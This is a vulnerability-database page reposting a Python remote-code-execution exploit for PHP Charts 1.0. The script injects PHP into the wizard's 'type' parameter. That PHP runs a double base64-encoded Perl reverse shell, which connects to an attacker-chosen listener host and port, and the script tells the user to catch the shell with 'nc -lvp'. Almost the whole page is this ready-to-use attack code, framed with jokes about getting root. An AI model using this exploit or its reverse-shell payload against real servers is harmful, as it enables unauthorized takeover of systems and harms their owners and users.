PHP Charts 1.0 Remote Code Execution

2013.06.26
Credit: infodox
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Original Advisory came from: # http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html # infodox - insecurety.net import requests import random import threading import sys def genpayload(host, port): """ Perl Reverse Shell Generator """ load = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';""" %(host, port) encoded = load.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') encoded = encoded.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') # double encoding , yes payload = "system(base64_decode(base64_decode('%s')))" %(encoded) return payload def hack(pwn): requests.get(pwn) def main(): haxurl = "http://" + target + path + "wizard/index.php?type=';INSERTCODE;//" payload = genpayload(host, port) pwn = haxurl.replace("INSERTCODE", payload) print "[+] Preparing for hax" print "[!] Please run nc -lvp %s on your listener" %(port) raw_input("Press Enter to Fire...") # debugging print "[*] Sending malicious request..." threading.Thread(target=hack, args=(pwn,)).start() # ph33r l33t thr34d1ng print "[?] g0tr00t?" sys.exit(0) def randomQuote(): quotes =\ ['Now with advice from Sabu!', 'Now with LOIC Support', 'Now with auto-DDoS', 'Now with auto-brag!', 'Now with advice from Kevin Mitnick', 'Now with silly quotes!', 'Comes with free forkbombs!', 'Now with a free copy of Havij', 'Are you stoned, or just stupid?'] randomQuote = random.choice(quotes) return randomQuote def banner(): print "PHP-Charts v1.0 Remote Code Execution Exploit." randomquote = randomQuote() print randomquote if len(sys.argv) != 5: banner() print "Usage: %s <target host> <path to wizard> <listener host> <listener port>" %(sys.argv[0]) print "Example: %s hackme.com /wp/chart/chart/ hacke.rs 1337" %(sys.argv[0]) sys.exit(1) else: banner() target = sys.argv[1] path = sys.argv[2] host = sys.argv[3] port = sys.argv[4] main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top